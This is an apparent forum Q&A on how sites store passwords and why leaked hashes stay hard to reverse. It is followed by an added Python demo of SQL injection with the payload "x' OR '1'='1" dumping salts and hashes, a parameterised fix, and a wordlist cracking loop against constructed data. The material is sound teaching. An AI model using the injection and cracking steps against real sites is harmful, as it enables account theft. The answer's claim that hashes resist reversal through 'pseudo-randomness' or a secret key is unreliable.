I’m in the process of familiarizing myself with the ins and outs of password security, and what level of screwed you are depending on how a site treated password security before a breach occurred.
What I understand so far is that if a site stores plaintext passwords and they’re leaked, anyone can instantly use them to access your account. If the passwords have been hashed, they’re more or less back to brute-forcing passwords and hoping the hash matches. If passwords are salted, extra data is added to the hashes, but (from what I understand) since this is also handled by the site (when you try to log in your password is hashed and salted before being compared to what they have saved), this doesn’t actually change the effectiveness of brute-forcing. I might be missing something here.
Either way, what I’d like to know is how sites keep the site code itself inaccessible to hackers, if site data, like tables containing user information, can be obtained. Theoretically, if a hacker had access to the specific hashing and salting being used, they could reverse-engineer the hashed passwords, right? But they don’t, and I don’t understand why they don’t, when they seem to be able to access other data. In previous answers on this topic I’ve seen people say that if hackers had access to site code they could just remove the necessity for a password, or otherwise get around those restrictions, but why can’t they get this access?
One example of a way passwords can get breached is a method known as SQLI (Sequel Injection, also known as SQL injection).
This is when unsanitized user input is directly entered into a database, like during logins, search bars, account creation, etc. Anything with a database is potentially vulnerable. So, using SQLI, hackers are able to extract the hashed password, and sometimes the salt that’s used to hash that password.
However, the site code is stored on a server somewhere; the hackers likely don’t have a way into that server, and therefore cannot extract or change the raw code that is being used.
For your question about hackers obtaining the salt and hash for a password, you ask why they can’t reverse-engineer the hashed password. That’s simply because it’s not possible. Modern-day algorithms that are encrypting these passwords have some degree of pseudo-randomness, which hackers will not be able to reverse-engineer without (as an example) a secret key, or something similar.
However, what they can do is run the hashed password and salt through a program called Hashcat. This takes in a wordlist of potential passwords, the password you want to try and crack, and some other tools that aren’t always needed. Then, the program will run every password through that hashing algorithm and salt, then compare it to the hashed password you gave it. If they match, the program stops and you have successfully cracked the password. If it ends without cracking, it means it’s run through the entire wordlist of passwords and didn’t find a correct one.
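The two steps the answer above describes, as an added example that is not part of the original post or any real site’s code: a tiny login lookup built by string concatenation, the injected input that makes it return every user’s salt and hash, the parameterised form of the same query that treats the input as plain data, and an offline dictionary attack that hashes each wordlist entry with the leaked salt and compares, which is the loop a tool like Hashcat runs at scale. The table layout, account names, passwords, wordlist and the choice of PBKDF2-HMAC-SHA256 as the hash are all constructed for the demo.

```python
"""
Added example (not from the original post): SQL injection pulling salts and
hashes out of a users table, the parameterised query that does not leak them,
and a wordlist attack against one leaked (salt, hash) pair.  All data here is
constructed for the demo; PBKDF2-HMAC-SHA256 is an assumed password hash.
"""
import hashlib
import hmac
import os
import sqlite3
from typing import List, Optional, Tuple

ITERATIONS = 10_000  # PBKDF2 work factor (kept small so the demo runs fast)


def hash_password(password: str, salt: bytes) -> str:
    """Salted PBKDF2-HMAC-SHA256; the per-user salt is stored beside the hash."""
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, ITERATIONS)
    return dk.hex()


def make_db() -> sqlite3.Connection:
    """In-memory users table with two constructed accounts."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (username TEXT, salt BLOB, pwhash TEXT)")
    for user, pw in (("alice", "summer2024"), ("bob", "correct horse")):
        salt = os.urandom(16)  # fresh random salt per user
        db.execute("INSERT INTO users VALUES (?, ?, ?)",
                   (user, salt, hash_password(pw, salt)))
    return db


def lookup_vulnerable(db: sqlite3.Connection, username: str) -> List[Tuple]:
    """The bug: user input is spliced straight into the SQL text."""
    sql = ("SELECT username, salt, pwhash FROM users WHERE username = '"
           + username + "'")
    return db.execute(sql).fetchall()


def lookup_safe(db: sqlite3.Connection, username: str) -> List[Tuple]:
    """Same lookup with a bound parameter: the input can never become SQL."""
    sql = "SELECT username, salt, pwhash FROM users WHERE username = ?"
    return db.execute(sql, (username,)).fetchall()


# Closes the open quote, then makes the WHERE clause true for every row.
INJECTION = "x' OR '1'='1"


def verify_login(db: sqlite3.Connection, username: str, password: str) -> bool:
    """How the site itself checks a login: rehash with the stored salt, compare."""
    rows = lookup_safe(db, username)
    if not rows:
        return False
    _, salt, pwhash = rows[0]
    return hmac.compare_digest(hash_password(password, salt), pwhash)


# Constructed wordlist standing in for a real cracking dictionary.
WORDLIST = ["password", "123456", "summer2023", "summer2024", "letmein"]


def crack(salt: bytes, pwhash: str, wordlist: List[str]) -> Optional[str]:
    """Dictionary attack: hash every candidate with the leaked salt and compare.

    Returns the matching candidate, or None when the wordlist is exhausted.
    """
    for candidate in wordlist:
        if hash_password(candidate, salt) == pwhash:
            return candidate
    return None


def demo() -> dict:
    """Dump the table through the injectable lookup, then crack each hash."""
    db = make_db()
    leaked = lookup_vulnerable(db, INJECTION)      # every (user, salt, hash)
    return {user: crack(salt, pwhash, WORDLIST) for user, salt, pwhash in leaked}


if __name__ == "__main__":
    print(demo())  # alice's password is in the wordlist, bob's is not
```

Two things worth noticing when running it: `lookup_safe(db, INJECTION)` returns no rows because the whole string is compared as a username, and hashing the same password with two different salts gives two different hashes, so a cracker has to redo the wordlist per leaked salt rather than reuse one precomputed table.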